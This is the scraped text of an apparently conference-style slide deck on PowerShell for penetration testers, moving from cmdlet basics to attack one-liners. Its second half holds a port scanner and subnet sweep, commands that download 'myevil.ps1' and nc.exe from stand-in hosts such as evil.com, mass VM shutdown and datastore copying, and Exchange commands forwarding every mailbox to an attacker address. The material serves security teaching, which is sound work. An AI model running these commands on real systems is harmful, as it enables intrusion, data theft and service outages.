Upload
buidat
View
231
Download
4
Embed Size (px)
Citation preview
Tim Medin
Counter Hack Challenges Background
Pen Tester – Internal, Perimeter, Web, Social, Telephony
Corp Security – Financial Services
Network Engineer – Higher Education
Software Engineer – Manufacturing & Industrial
Control Systems Engineer
Contributions Laudanum CommandLineKungFu.com Packetstan.com Other blogs
Local DefCon and Security Groups
CCDC Local Universities
Coolness of PowerShell Basics of PowerShell Quick Command Line Attacks Script Execution 3rd Party CmdLets
CMD is teh sUck!!1! Need upgrade, badly Nothing is standard
Naming Switches Switch operators
dash v. slash
Why would you want to parse anything? Are you too good for the For Loop!
Installed by default on Windows 7, Server 2008R2, and later
Full integration with Microsoft Server Products Exchange SharePoint Active Directory
Third Party Apps too VMware!
Full access to .NET Framework
In short, FUN!
Basics of PowerShell
“CmdLets” are quite standard PowerShell Naming Convention
Names are Verb-‐Noun Verbs Standardized by Microsoft ▪ Get vs. Read ▪ Find vs. Search
Common Parameter Names Help
We don’t have to parse text! Easily string together many commands Easier to read $_.Length vs cut -d' ' –f4
Don’t have to know what the 4th item in the output is, as with Cut or AWK
Just like other shells, but… Objects!
Find files containing “blah” Get-ChildItem | Select-String blah –list
Find files containing “blah”…and delete them Get-ChildItem | Select-String blah –list | Remove-Item
Prefixed with $ Dot access properties and methods of an object
$_ Current Pipeline Object Used in script blocks, filters (Where-‐Object), ForEach-‐Object, and switches
$true $false $null See them all with: Get-ChildItem variable:
PowerShell PowerShell Alias CMD *nix
Get-‐ChildItem ls, gci, dir dir ls
Copy-‐Item cp, copy, cpi copy cp
Move-‐Item move, mv, mi move mv
Select-‐String <none> find, findstr grep
Get-‐Help man, help help man
Get-‐Content cat, gc, type type cat
Easy! Aliases match CMD and Bash
ForEach-‐Object (alias %) Operates on each object passed down the pipeline, Not to be confused with ForEach, a looping statement
Get-ChildItem | ForEach-Object { "do something with " + $_.Name}
ls | % { "do something with " + $_.Name }
Where-‐Object (alias ?) Used to filter objects passed down the pipeline
Get-Process | ? { $_.Modules -like "*(rsaenh.dll)*" -and $_.Modules -like "*(iphlpapi.dll)*"
-and $_.Modules -like "*(WININET.dll)*" }
Out-‐* Output to file, Host, Printer, …
Export-‐CSV Exports object, with names and properties Import-‐CSV can read it back in
Group-‐Object Groups objects together based on properties
Sort-‐Object
Get-‐Member (alias gm) Gets all the properties and methods of an object type
Available properties and Methods on Files ls | gm
Format-‐List (alias fl) Output the properties of all the object passed down the pipeline, only “default” properties
Use * to see all the properties ls | fl *
Gets a list of commands (DUH!) With no parameters it lists everything
-‐Noun <string> -‐Verb <string> -‐Module <string> All cmdlets in a module (e.g. Exchange, VMware, etc.)
Very useful for finding the cmdlet you need!
Can use it on aliases too (e.g. ls, mv) Default output is isn’t really useful Useful switches
-‐Examples (-‐ex for short) -‐Full
Aliases Parameters
Need as much of the name as necessary to uniquely identify it. ✗ ls -‐f “f” matches Filter & Force ✔ ls -‐fo “fo” only matches Force ✔ ls -‐for “for” only matches Force
Works for CmdLets AND PARAMETERS! Allows you to cycle though matching names
You complete me!
PS C:\> 1..1024 | % { echo ((new-object Net.Sockets.TcpClient) .Connect("10.1.1.14",$_)) "$_ is open" } 2>$null
25 is open
Pseudo Code 1..1024 | foreach-object { print (connection_attempt “port is open”) } Discard error message
The trick PS C:\> echo (1+1) (2+2) 2 4
PS C:\> echo (1/0) (2+2) Attempt to divide by zero <-‐ 2+2 is not output
PS C:\> 1..255 | % { echo ((new-object Net.Sockets.TcpClient) .Connect("10.1.1.$_",445)) "10.1.1.$_" } 2>$null
10.1.1.5
Access text file like this (to stdout):
(New-Object System.Net.WebClient) .DownloadString("http://mysite.com/myevil.ps1")
To save it a file:
… | Out-File –Encoding ASCII myfile.ps1
What if we want to download an executable?
(New-Object System.Net.WebClient) .DownloadFile( "http://mysite.com/nc.exe", "c:\nc.exe" )
…but, we can’t PowerShell with netcat
Wants a Terminal From Meterpreter, go BOOM What about a script?
Default Execution Policy stop scripts Default mode is “Restricted” Change it to allow local, unsigned scripts with Set-ExecutionPolicy RemoteSigned ▪ Changing requires Admin Permissions
BUT…
Get-Help about_Execution_Policies
The execution policy is not a security system that restricts user actions. For example, users can easily circumvent a policy by typing the script contents at the command line when they cannot run a script. Instead, the execution policy helps users to set basic rules and prevents them from violating them unintentionally.
C:\temp> powershell -command ls powershell -command ls
Directory: C:\temp
Mode LastWriteTime Length Name ---- ------------- ------ ---- -a--- 3/22/2012 5:10 PM 14 file2 -a--- 3/22/2012 5:10 PM 12 file3
C:\> powershell -command "(New-Object System.Net.WebClient).DownloadFile('http://evil.com/nc.exe', 'nc.exe’)"
C:\temp> powershell -command ls powershell -command ls
Directory: C:\temp
Mode LastWriteTime Length Name ---- ------------- ------ ---- -a--- 3/22/2012 5:10 PM 14 file2 -a--- 3/22/2012 5:10 PM 12 file3 -a--- 3/23/2012 12:10 PM 61440 nc.exe
Run a script without running a script Uses Encoded Command DefCon 18 Talk by Dave Kennedy (ReL3K) and Josh Kelley (Winfang)
Windump Dump SAM via PowerShell, but has problems
Interface to VMware vSphere Extremely Powerful! Commands Connect-VIServer vc1 –User tm –Password pw
Get-VM
Get-VM | Stop-VM –Confirm:$false <-‐ Power off Everything
DON’T RUN THIS!
I want data…data is on the servers…so get the whole server?
$ds = Get-Datastore <datastore-name>
New-PSDrive -Name MyDS -PSProvider ViMdatastore -Root '\' -location $ds
Copy-DatastoreItem MyDS:\Fldr2\ -Destination C:\temp
Firewall-‐Shmirewall! Runs a PowerShell script IN the guest OS of each of the specified virtual machines
It does require credentials to access the Guest We can probably get those when we download the VM
Why yes, I’d like all your email
Set-Mailbox joeuser -DeliverToMailboxAndForward:$True -ForwardingAddress [email protected]
Why yes, I’d like EVERYONE’S email
Get-Mailbox | Set-Mailbox -DeliverToMailboxAndForward:$True -ForwardingAddress [email protected]
Requires Domain Admin Permissions Providers
Microsoft -‐ Requires one of the following ▪ Windows 2008 R2 Domain Controller ▪ Windows 2008 R2 Server running Lightweight Directory Services
Quest – client only (better for pen testing) List all users in a pretty CSV Get-ADUser | Export-CSV us.csv <-‐MS Get-QADUser | Export-CSV us.csv <-‐Quest
All users without password expirations Get-QADUser -Enabled -PasswordNeverExpires:$true
PowerShell is a significant upgrade from CMD We can use the same CMD Fu, but it’s easier (albeit more verbose)
Lot’s of interaction with other products
@timmedin
SEC 560: Network Penetration Testing Ethical Hacking – Dallas, June 18 – 23
SEC 504: Hacker Techniques, Exploits and Incident Handling – Raleigh, July 16 – 21
Brute for VMware creds http://blog.securitywhole.com/2009/09/01/brute-‐force-‐esx-‐usernamepassword.aspx
PowerShell, it’s time to own http://www.secmaniac.com/files/PowerShell_Defcon.pdf
Command Line Kung Fu Blog http://www.commandlinekungfu.com
Hey! Scripting Guy! http://blogs.technet.com/b/heyscriptingguy